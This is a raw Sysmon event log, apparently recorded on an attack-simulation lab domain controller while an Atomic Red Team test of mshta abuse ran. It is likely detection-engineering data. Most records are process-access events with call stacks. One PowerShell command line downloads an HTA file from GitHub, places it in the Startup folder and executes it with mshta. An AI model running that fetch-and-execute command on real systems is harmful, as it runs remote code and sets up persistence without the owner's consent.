15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789728Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789727Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789726Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789725Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.845{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789724Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.829{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789723Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.829{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789722Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.829{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789721Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.829{732C744F-3254-6010-CFA2-00000000A301}54247448C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b4f07|UNKNOWN(00007FFC8AA1331B)|UNKNOWN(00007FFC89EB41A5)|UNKNOWN(00007FFC89EB3E76)|UNKNOWN(00007FFC8A9654DB)|UNKNOWN(00007FFC89E74A0C)|UNKNOWN(00007FFC89ED2EDB)|UNKNOWN(00007FFC89EB6540)|UNKNOWN(00007FFC89EB6540)|UNKNOWN(00007FFC89EB63D1)|UNKNOWN(00007FFC89EA8356)|UNKNOWN(00007FFC89EB4889)|UNKNOWN(00007FFC89EB4425)|UNKNOWN(00007FFC89EB41A5)|UNKNOWN(00007FFC89EB3E76)|UNKNOWN(00007FFC8A9654DB)|UNKNOWN(00007FFC89E74A0C)|UNKNOWN(00007FFC89ED2EDB) 154100x8000000000000000789720Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.844{732C744F-3254-6010-D0A2-00000000A301}1232C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXE"C:\Windows\system32\mshta.exe" "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta"C:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {$var =Invoke-WebRequest \""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"" $var.content|out-file \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\"" mshta \""$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta\""} 11241100x8000000000000000789719Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.localT10232021-01-26 15:16:36.829{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T1218.005.hta2021-01-26 14:41:37.766 10341000x8000000000000000789718Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.454{732C744F-151A-600B-1600-00000000A301}15281680C:\Windows\system32\svchost.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789717Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.454{732C744F-151A-600B-1600-00000000A301}15281564C:\Windows\system32\svchost.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789716Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.408{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789715Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.408{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000789714Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.361{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\__PSScriptPolicyTest_4v2z4znb.5vt.ps12021-01-26 15:16:36.361 10341000x8000000000000000789713Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.345{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789712Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789711Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3254-6010-CFA2-00000000A301}5424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789710Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789709Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789708Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789707Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789706Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789705Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789704Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789703Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\